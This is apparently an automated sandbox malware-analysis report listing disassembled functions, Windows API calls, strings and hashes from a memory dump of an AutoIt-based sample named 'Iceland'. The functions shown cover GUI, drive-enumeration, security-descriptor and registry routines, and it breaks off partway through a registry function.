Opcode Fuzzy Hash: 02eb9acf522bdd84cb65fc7f5d5c72d1e9817b9b517aca941be2b35fcf5c2149
Instruction Fuzzy Hash: C2D05BBF15410038F41F073C4D1FB76150DE709741F4CC6C9B24AC56D8F5D59D00A021

Function 00930D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0093075E), ref: 00930D4A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 345e8dd3a9127f629e24aafcb12afe23febf4bdf7765fbbeb0f5703e8bc3125f
Instruction ID: 8572132a7c9267c838ac5e8854cf3c1e4f74dc46ecbd47e76512e1f9b7659e0b
Opcode Fuzzy Hash: 345e8dd3a9127f629e24aafcb12afe23febf4bdf7765fbbeb0f5703e8bc3125f
Instruction Fuzzy Hash:

Function 0099353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0099358D
DeleteObject.GDI32(00000000), ref: 009935A0
DestroyWindow.USER32 ref: 009935AF
GetDesktopWindow.USER32 ref: 009935CA
GetWindowRect.USER32(00000000), ref: 009935D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00993700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0099370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00993755
GetClientRect.USER32(00000000,?), ref: 00993761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0099379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009937BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009937D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009937DD
GlobalLock.KERNEL32(00000000), ref: 009937E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009937F5
GlobalUnlock.KERNEL32(00000000), ref: 009937FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00993805
GlobalFree.KERNEL32(00000000), ref: 00993810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00993822
OleLoadPicture.OLEAUT32(?,00000000,00000000,009B0C04,00000000), ref: 00993838
GlobalFree.KERNEL32(00000000), ref: 00993848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0099386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0099388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009938AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00993A9C

Strings

AutoIt v3, xrefs: 0099374F
DISPLAY, xrefs: 009938FF
static, xrefs: 00993797, 009938EE
, xrefs: 00993A22

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 63f5a4f393c618af4ccd3be02b93364fc85d710ec5f4718c4589d9e9620f0076
Instruction ID: fdf8c5e30a8874a47cff364941b95e135e109f175ad171ec972c41c230d52ee9
Opcode Fuzzy Hash: 63f5a4f393c618af4ccd3be02b93364fc85d710ec5f4718c4589d9e9620f0076
Instruction Fuzzy Hash: C3027171610109EFDB14DF68CD89EAE7BB9EF49710F048118F916AB2A0DB74AD41DFA0

Function 009A7B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 009A7B67
GetSysColorBrush.USER32(0000000F), ref: 009A7B98
GetSysColor.USER32(0000000F), ref: 009A7BA4
SetBkColor.GDI32(?,000000FF), ref: 009A7BBE
SelectObject.GDI32(?,?), ref: 009A7BCD
InflateRect.USER32(?,000000FF,000000FF), ref: 009A7BF8
GetSysColor.USER32(00000010), ref: 009A7C00
CreateSolidBrush.GDI32(00000000), ref: 009A7C07
FrameRect.USER32(?,?,00000000), ref: 009A7C16
DeleteObject.GDI32(00000000), ref: 009A7C1D
InflateRect.USER32(?,000000FE,000000FE), ref: 009A7C68
FillRect.USER32(?,?,?), ref: 009A7C9A
GetWindowLongW.USER32(?,000000F0), ref: 009A7CBC

Part of subcall function 009A7E22: GetSysColor.USER32(00000012), ref: 009A7E5B
Part of subcall function 009A7E22: SetTextColor.GDI32(?,009A7B2D), ref: 009A7E5F
Part of subcall function 009A7E22: GetSysColorBrush.USER32(0000000F), ref: 009A7E75
Part of subcall function 009A7E22: GetSysColor.USER32(0000000F), ref: 009A7E80
Part of subcall function 009A7E22: GetSysColor.USER32(00000011), ref: 009A7E9D
Part of subcall function 009A7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009A7EAB
Part of subcall function 009A7E22: SelectObject.GDI32(?,00000000), ref: 009A7EBC
Part of subcall function 009A7E22: SetBkColor.GDI32(?,?), ref: 009A7EC5
Part of subcall function 009A7E22: SelectObject.GDI32(?,?), ref: 009A7ED2
Part of subcall function 009A7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 009A7EF1
Part of subcall function 009A7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009A7F08
Part of subcall function 009A7E22: GetWindowLongW.USER32(?,000000F0), ref: 009A7F15

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: dfb66401811982f1218135880ccfe3d0d3eb7ea611ae21597fcfac1e45d5f138
Instruction ID: 607c8b3b66f37d7129a4ca5d95e1e19bc7e504f6092f01cc9edcc9b12700e804
Opcode Fuzzy Hash: dfb66401811982f1218135880ccfe3d0d3eb7ea611ae21597fcfac1e45d5f138
Instruction Fuzzy Hash: E5A1AD7241D301BFCB409FA4DC49A6BBBA9FF8A324F100A19F9A2961E0D735D944DBD1

Function 00911625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 009116B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00952B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00952B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00952F85

Part of subcall function 00911802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00911488,?,00000000,?,?,?,?,0091145A,00000000,?), ref: 00911865

SendMessageW.USER32(?,00001053), ref: 00952FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00952FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00952FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00952FF9

Strings

0, xrefs: 00952E11

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 3da0f16ebeaf132c22ca5a6924312e22c75ee011914faac50340233cd3f43aaa
Instruction ID: 46c5d8e0aa8692603e787afa8686c451c9c8bd937009f31de3a5444335053986
Opcode Fuzzy Hash: 3da0f16ebeaf132c22ca5a6924312e22c75ee011914faac50340233cd3f43aaa
Instruction Fuzzy Hash: 0412E130209241EFC725CF15C884BA9B7F9FF46302F184569F9959B662CB31EC8ADB91

Function 0099316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0099319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009932C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00993306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00993316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0099335D
GetClientRect.USER32(00000000,?), ref: 00993369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 009933B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009933C1
GetStockObject.GDI32(00000011), ref: 009933D1
SelectObject.GDI32(00000000,00000000), ref: 009933D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 009933E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009933EE
DeleteDC.GDI32(00000000), ref: 009933F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00993423
SendMessageW.USER32(00000030,00000000,00000001), ref: 0099343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0099347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0099348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 0099349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 009934D4
GetStockObject.GDI32(00000011), ref: 009934DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009934EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 009934F4

Strings

AutoIt v3, xrefs: 00993355
DISPLAY, xrefs: 009933B7
static, xrefs: 009933AC, 009934CE
msctls_progress32, xrefs: 00993470

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 5017a2d0cdfd95ca47583a0546e559f3d460f30b0093e3e79bfba18ac247a553
Instruction ID: 683efe4320b013482fffd4b221bd75c9ccdb48754caf6642122ee5ca22c7eeca
Opcode Fuzzy Hash: 5017a2d0cdfd95ca47583a0546e559f3d460f30b0093e3e79bfba18ac247a553
Instruction Fuzzy Hash: 97B13DB1A50219AFEB14DFA8CC89FAF7BB9EF49710F008115F915AB290D774AD40DB90

Function 00985524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00985532
GetDriveTypeW.KERNEL32(?,009ADC30,?,\\.\,009ADCD0), ref: 0098560F
SetErrorMode.KERNEL32(00000000,009ADC30,?,\\.\,009ADCD0), ref: 0098577B

Strings

SAS, xrefs: 0098570E
Unknown, xrefs: 00985632, 009856C8
RAMDisk, xrefs: 00985639
Removable, xrefs: 00985655, 0098565A
MMC, xrefs: 00985723
FileBackedVirtual, xrefs: 00985731
ATA, xrefs: 009856DD
SATA, xrefs: 00985715
Virtual, xrefs: 0098572A
1394, xrefs: 009856E4
\\.\, xrefs: 00985584
iSCSI, xrefs: 00985707
Fibre, xrefs: 009856F2
CDROM, xrefs: 00985640
SSD, xrefs: 0098568F
SCSI, xrefs: 009856CF
SSA, xrefs: 009856EB
Network, xrefs: 00985647
Fixed, xrefs: 0098564E
USB, xrefs: 009856F9
PhysicalDrive, xrefs: 009855BB
RAID, xrefs: 00985700
ATAPI, xrefs: 009856D6

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: f1942e36765def9f6618798abd6e21b33fd573c6f3be1f1c16db8a044cb6e3d2
Instruction ID: 70636fa829d65ee2a8cd7dbdf7ca5de80de3ee5dd520373860c99361db033c6f
Opcode Fuzzy Hash: f1942e36765def9f6618798abd6e21b33fd573c6f3be1f1c16db8a044cb6e3d2
Instruction Fuzzy Hash: 2C612A30688A05DFC724FF64C9919B8F3B2EF84354BA5C41AE4069B391E735DD49DB41

Function 009A1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 009A1BC4
GetDesktopWindow.USER32 ref: 009A1BD9
GetWindowRect.USER32(00000000), ref: 009A1BE0
GetWindowLongW.USER32(?,000000F0), ref: 009A1C35
DestroyWindow.USER32(?), ref: 009A1C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009A1C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009A1CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009A1CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 009A1CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 009A1CE1
IsWindowVisible.USER32(00000000), ref: 009A1D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009A1D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009A1D6C
GetWindowRect.USER32(00000000,?), ref: 009A1D84
MonitorFromPoint.USER32(?,?,00000002), ref: 009A1DAA
GetMonitorInfoW.USER32(00000000,?), ref: 009A1DC4
CopyRect.USER32(?,?), ref: 009A1DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 009A1E46

Strings

(, xrefs: 009A1DB7
0, xrefs: 009A1B6F
tooltips_class32, xrefs: 009A1C82

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 0b36084a3583491e53ecd86cccc4d24a6df24ded391f9e1e579eff3aebe102ea
Instruction ID: 49d6d6056c686e4afd743c22b823dfa11d742c8bbb03b99008bc3b9d87c07af0
Opcode Fuzzy Hash: 0b36084a3583491e53ecd86cccc4d24a6df24ded391f9e1e579eff3aebe102ea
Instruction Fuzzy Hash: 99B17D71608311AFD714DF64C985B9BBBE5FF85314F00891CF99A9B2A1C771E844CB92

Function 009A0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009A0D81
_wcslen.LIBCMT ref: 009A0DBB
_wcslen.LIBCMT ref: 009A0E25
_wcslen.LIBCMT ref: 009A0E8D
_wcslen.LIBCMT ref: 009A0F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009A0F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009A0FA0

Part of subcall function 0092FD52: _wcslen.LIBCMT ref: 0092FD5D

Part of subcall function 00972B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00972BA5
Part of subcall function 00972B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00972BD7

Strings

SELECTCLEAR, xrefs: 009A0FC9
SELECT, xrefs: 009A0FE4
GETSELECTED, xrefs: 009A107D
GETTEXT, xrefs: 009A0E88, 009A0EA3
GETSELECTEDCOUNT, xrefs: 009A0F0C, 009A0F27
ISSELECTED, xrefs: 009A0F79
VIEWCHANGE, xrefs: 009A1111
DESELECT, xrefs: 009A1038
GETITEMCOUNT, xrefs: 009A0DB2, 009A0DD3
FINDITEM, xrefs: 009A10C3
SELECTALL, xrefs: 009A0FB1
GETSUBITEMCOUNT, xrefs: 009A0E20, 009A0E3B
SELECTINVERT, xrefs: 009A101A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 3305357b12be9f10941ac4db785559ef13bb502ba9a3c2b9b5b458c732cb8bf0
Instruction ID: 5e58a5d64d943f56a80fc89c9608fc13f103986d88aa83307237c12a14055afc
Opcode Fuzzy Hash: 3305357b12be9f10941ac4db785559ef13bb502ba9a3c2b9b5b458c732cb8bf0
Instruction Fuzzy Hash: 5EE1CF322183418FC714DF24C951A6AB3E6BFDA314F14896DF496AB3A2DB30ED45CB91

Function 00912521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009125F8
GetSystemMetrics.USER32(00000007), ref: 00912600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0091262B
GetSystemMetrics.USER32(00000008), ref: 00912633
GetSystemMetrics.USER32(00000004), ref: 00912658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00912675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00912685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 009126B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 009126CC
GetClientRect.USER32(00000000,000000FF), ref: 009126EA
GetStockObject.GDI32(00000011), ref: 00912706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00912711

Part of subcall function 009119CD: GetCursorPos.USER32(?), ref: 009119E1
Part of subcall function 009119CD: ScreenToClient.USER32(00000000,?), ref: 009119FE
Part of subcall function 009119CD: GetAsyncKeyState.USER32(00000001), ref: 00911A23
Part of subcall function 009119CD: GetAsyncKeyState.USER32(00000002), ref: 00911A3D

SetTimer.USER32(00000000,00000000,00000028,0091199C), ref: 00912738

Strings

AutoIt v3 GUI, xrefs: 009126B0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: ab3ffaf161aa600768a792f8a56240e31867193b5fb3c4659747fb2123e19b4e
Instruction ID: cf336f1d581e30b7a84c1d327d6b0fd6a1a34bc631902017f91c9078cd74238c
Opcode Fuzzy Hash: ab3ffaf161aa600768a792f8a56240e31867193b5fb3c4659747fb2123e19b4e
Instruction Fuzzy Hash: 28B18D71A04209DFDB14DFA8CD95BEE7BB9FB48315F104229FA16AB290DB74E840DB50

Function 009716D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00971A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00971A60
Part of subcall function 00971A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,009714E7,?,?,?), ref: 00971A6C
Part of subcall function 00971A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009714E7,?,?,?), ref: 00971A7B
Part of subcall function 00971A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009714E7,?,?,?), ref: 00971A82
Part of subcall function 00971A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00971A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00971741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00971775
GetLengthSid.ADVAPI32(?), ref: 0097178C
GetAce.ADVAPI32(?,00000000,?), ref: 009717C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009717E2
GetLengthSid.ADVAPI32(?), ref: 009717F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00971801
HeapAlloc.KERNEL32(00000000), ref: 00971808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00971829
CopySid.ADVAPI32(00000000), ref: 00971830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0097185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00971881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00971893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009718BA
HeapFree.KERNEL32(00000000), ref: 009718C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009718CA
HeapFree.KERNEL32(00000000), ref: 009718D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009718DA
HeapFree.KERNEL32(00000000), ref: 009718E1
GetProcessHeap.KERNEL32(00000000,?), ref: 009718ED
HeapFree.KERNEL32(00000000), ref: 009718F4

Part of subcall function 00971ADF: GetProcessHeap.KERNEL32(00000008,009714FD,?,00000000,?,009714FD,?), ref: 00971AED
Part of subcall function 00971ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,009714FD,?), ref: 00971AF4
Part of subcall function 00971ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009714FD,?), ref: 00971B03

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 8b8544eab828aef610940e3a6a40f7832f3808d71c16dac8f5ad1621cc8e747e
Instruction ID: 847bd8e4104df1af7f4190c61267313f1d2e9a297c3aabd9af99812e9e61c983
Opcode Fuzzy Hash: 8b8544eab828aef610940e3a6a40f7832f3808d71c16dac8f5ad1621cc8e747e
Instruction Fuzzy Hash: 0A7158B2D0521AABDF10DFA9DC49FEEBBBCBF44300F148125E919A6190D7309A05CBA1

Function 0099CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0099CF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,009ADCD0,00000000,?,00000000,?,?), ref: 0099CFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0099D004
_wcslen.LIBCMT ref: 0099D054
